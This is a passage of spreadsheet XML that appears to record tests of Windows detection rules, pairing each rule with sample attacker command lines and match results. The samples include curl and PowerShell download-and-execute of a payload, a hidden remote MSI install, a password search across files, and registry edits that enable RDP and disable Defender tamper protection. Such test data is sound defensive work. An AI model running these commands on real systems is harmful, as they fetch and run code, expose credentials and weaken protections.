    <row r="1623" ht="15.75" customHeight="1" s="42">
      <c r="A1623" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B1623" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C1623" s="36" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D1623" s="36" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E1623" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C curl http://example.com/payload.exe &gt; payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F1623" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1623" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1623" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1623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623" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1623" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1624" ht="15.75" customHeight="1" s="42">
      <c r="A1624" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B1624" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C1624" s="43" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D1624" s="43" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E1624" s="43" t="inlineStr">
        <is>
          <t>cmd.exe -"c" curl http://example.com/payload.exe &gt; payload.exe &amp; payload.exe</t>
        </is>
      </c>
      <c r="F1624" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1624" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1624" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1624" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1624" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1624" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1625" ht="15.75" customHeight="1" s="42">
      <c r="A1625" s="36" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B1625" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C1625" s="36" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D1625" s="36" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E1625" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "curl http://example.com/payload.exe -o payload.exe ; .\payload.exe"</t>
        </is>
      </c>
      <c r="F1625" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1625" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1625" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1625" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1625" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1625" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1626" ht="15.75" customHeight="1" s="42">
      <c r="A1626" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B1626" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C1626" s="36" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D1626" s="36" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E1626" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "curl http://example.com/payload.exe -o payload.exe ; .\payload.exe"</t>
        </is>
      </c>
      <c r="F1626" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1626" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1626" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1626" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1626" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1626" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1627" ht="15.75" customHeight="1" s="42">
      <c r="A1627" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B1627" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_curl_download_exec_combo</t>
        </is>
      </c>
      <c r="C1627" s="36" t="inlineStr">
        <is>
          <t>Curl Download And Execute Combination</t>
        </is>
      </c>
      <c r="D1627" s="36" t="inlineStr">
        <is>
          <t>21dd6d38-2b18-4453-9404-a0fe4a0cc288</t>
        </is>
      </c>
      <c r="E1627" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -C "curl http://example.com/payload.exe -o payload.exe ; .\payload.exe"</t>
        </is>
      </c>
      <c r="F1627" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1627" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1627" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1627" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J1627" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1627" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1628" ht="15.75" customHeight="1" s="42">
      <c r="A1628" s="43" t="n"/>
      <c r="B1628" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C1628" s="36" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D1628" s="36" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E1628" s="36" t="inlineStr">
        <is>
          <t>findstr.exe -si "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F1628" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1628" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1628" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1628" s="36" t="n"/>
      <c r="J1628" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1628" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1629" ht="15.75" customHeight="1" s="42">
      <c r="A1629" s="43" t="n"/>
      <c r="B1629" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C1629" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D1629" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E1629" s="36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1629" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1629" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1629" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1629" s="36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629" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1629" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1630" ht="15.75" customHeight="1" s="42">
      <c r="A1630" s="43" t="n"/>
      <c r="B1630" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C1630" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D1630" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E1630" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden -C "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F1630" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1630" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1630" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1630" s="43" t="n"/>
      <c r="J1630" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1630" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1631" ht="15.75" customHeight="1" s="42">
      <c r="A1631" s="43" t="n"/>
      <c r="B1631" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C1631" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D1631" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E1631" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -w Hidden -C "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F1631" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1631" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1631" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1631" s="43" t="n"/>
      <c r="J1631" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1631" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1632" ht="15.75" customHeight="1" s="42">
      <c r="A1632" s="43" t="n"/>
      <c r="B1632" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C1632" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D1632" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E1632" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden -c "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F1632" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1632" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1632" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1632" s="43" t="n"/>
      <c r="J1632" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1632" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1633" ht="15.75" customHeight="1" s="42">
      <c r="A1633" s="43" t="n"/>
      <c r="B1633" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C1633" s="36" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D1633" s="36" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E1633" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe C:\temp\custom_module.dll,Main</t>
        </is>
      </c>
      <c r="F1633" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1633" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1633" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1633" s="43" t="n"/>
      <c r="J1633" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1633" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1634" ht="15.75" customHeight="1" s="42">
      <c r="A1634" s="43" t="n"/>
      <c r="B1634" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C1634" s="36" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D1634" s="36" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E1634" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Windows\Temp\renamed_payload.dll,DllMain</t>
        </is>
      </c>
      <c r="F1634" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1634" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1634" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1634" s="43" t="n"/>
      <c r="J1634" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1634" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1635" ht="15.75" customHeight="1" s="42">
      <c r="A1635" s="43" t="n"/>
      <c r="B1635" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C1635" s="36" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D1635" s="36" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E1635" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" C:\Windows\Temp\t^m^p.bat</t>
        </is>
      </c>
      <c r="F1635" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1635" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1635" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1635" s="43" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution (95022b85-ff2a-49fa-939a-d7b8f56eeb9b)</t>
        </is>
      </c>
      <c r="J1635" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1635" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1636" ht="15.75" customHeight="1" s="42">
      <c r="A1636" s="43" t="n"/>
      <c r="B1636" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C1636" s="36" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D1636" s="36" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E1636" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Temp\GTHREA~1.DLL,EntryPoint</t>
        </is>
      </c>
      <c r="F1636" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1636" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1636" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1636" s="43" t="inlineStr">
        <is>
          <t>Use NTFS Short Name in Command Line (dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795); Use NTFS Short Name in Command Line (dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795)</t>
        </is>
      </c>
      <c r="J1636" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1636" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1637" ht="15.75" customHeight="1" s="42">
      <c r="A1637" s="43" t="n"/>
      <c r="B1637" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1637" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1637" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1637" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F1637" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1637" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1637" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1637" s="43" t="n"/>
      <c r="J1637" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1637" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1638" ht="15.75" customHeight="1" s="42">
      <c r="A1638" s="43" t="n"/>
      <c r="B1638" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1638" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1638" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1638" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F1638" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1638" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1638" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1638" s="43" t="n"/>
      <c r="J1638" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1638" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1639" ht="15.75" customHeight="1" s="42">
      <c r="A1639" s="43" t="n"/>
      <c r="B1639" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1639" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1639" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1639" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1639" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1639" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1639" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1639" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1639" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1639" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1640" ht="15.75" customHeight="1" s="42">
      <c r="A1640" s="43" t="n"/>
      <c r="B1640" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1640" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1640" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1640" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1640" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1640" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1640" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1640" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1640" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1640" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1641" ht="15.75" customHeight="1" s="42">
      <c r="A1641" s="43" t="n"/>
      <c r="B1641" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1641" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1641" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1641" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1641" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1641" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1641" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1641" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1641" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1641" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1642" ht="15.75" customHeight="1" s="42">
      <c r="A1642" s="43" t="n"/>
      <c r="B1642" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1642" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1642" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1642" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1642" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1642" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1642" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1642" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1642" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1642" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1643" ht="15.75" customHeight="1" s="42">
      <c r="A1643" s="43" t="n"/>
      <c r="B1643" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1643" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1643" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1643" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1643" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1643" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1643" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1643" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1643" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1643" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1644" ht="15.75" customHeight="1" s="42">
      <c r="A1644" s="43" t="n"/>
      <c r="B1644" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_lsa_disable_restricted_admin</t>
        </is>
      </c>
      <c r="C1644" s="36" t="inlineStr">
        <is>
          <t>RestrictedAdminMode Registry Value Tampering - ProcCreation</t>
        </is>
      </c>
      <c r="D1644" s="36" t="inlineStr">
        <is>
          <t>28ac00d6-22d9-4a3c-927f-bbd770104573</t>
        </is>
      </c>
      <c r="E1644" s="36" t="inlineStr">
        <is>
          <t>set "p1=Disable" &amp;&amp; set "p2=RestrictedAdmin" &amp;&amp; reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v %p1%%p2% /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F1644" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1644" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1644" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1644" s="43" t="n"/>
      <c r="J1644" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1644" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1645" ht="15.75" customHeight="1" s="42">
      <c r="A1645" s="43" t="n"/>
      <c r="B1645" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_rdp_keys_tamper</t>
        </is>
      </c>
      <c r="C1645" s="43" t="inlineStr">
        <is>
          <t>Potential Tampering With RDP Related Registry Keys Via Reg.EXE</t>
        </is>
      </c>
      <c r="D1645" s="43" t="inlineStr">
        <is>
          <t>0d5675be-bc88-4172-86d3-1e96a4476536</t>
        </is>
      </c>
      <c r="E1645" s="43" t="inlineStr">
        <is>
          <t>echo Y | reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0</t>
        </is>
      </c>
      <c r="F1645" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1645" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1645" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1645" s="43" t="n"/>
      <c r="J1645" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1645" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1646" ht="15.75" customHeight="1" s="42">
      <c r="A1646" s="36" t="n"/>
      <c r="B1646" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_rdp_keys_tamper</t>
        </is>
      </c>
      <c r="C1646" s="36" t="inlineStr">
        <is>
          <t>Potential Tampering With RDP Related Registry Keys Via Reg.EXE</t>
        </is>
      </c>
      <c r="D1646" s="36" t="inlineStr">
        <is>
          <t>0d5675be-bc88-4172-86d3-1e96a4476536</t>
        </is>
      </c>
      <c r="E1646" s="36" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM\SYSTEM\ControlSet001\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F1646" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1646" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1646" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1646" s="43" t="n"/>
      <c r="J1646" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1646" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1647" ht="15.75" customHeight="1" s="42">
      <c r="A1647" s="36" t="n"/>
      <c r="B1647" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_rdp_keys_tamper</t>
        </is>
      </c>
      <c r="C1647" s="36" t="inlineStr">
        <is>
          <t>Potential Tampering With RDP Related Registry Keys Via Reg.EXE</t>
        </is>
      </c>
      <c r="D1647" s="36" t="inlineStr">
        <is>
          <t>0d5675be-bc88-4172-86d3-1e96a4476536</t>
        </is>
      </c>
      <c r="E1647" s="36" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0/f</t>
        </is>
      </c>
      <c r="F1647" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1647" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1647" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1647" s="43" t="n"/>
      <c r="J1647" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1647" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1648" ht="15.75" customHeight="1" s="42">
      <c r="A1648" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B1648" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_susp_paths</t>
        </is>
      </c>
      <c r="C1648" s="36" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths</t>
        </is>
      </c>
      <c r="D1648" s="36" t="inlineStr">
        <is>
          <t>b7e2a8d4-74bb-4b78-adc9-3f92af2d4829</t>
        </is>
      </c>
      <c r="E1648" s="36" t="inlineStr">
        <is>
          <t>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F1648" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1648" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1648" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1648" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829); Suspicious Windows Defender Registry Key Tampering Via Reg.EXE (452bce90-6fb0-43cc-97a5-affc283139b3)</t>
        </is>
      </c>
      <c r="J1648" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1648" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1649" ht="15.75" customHeight="1" s="42">
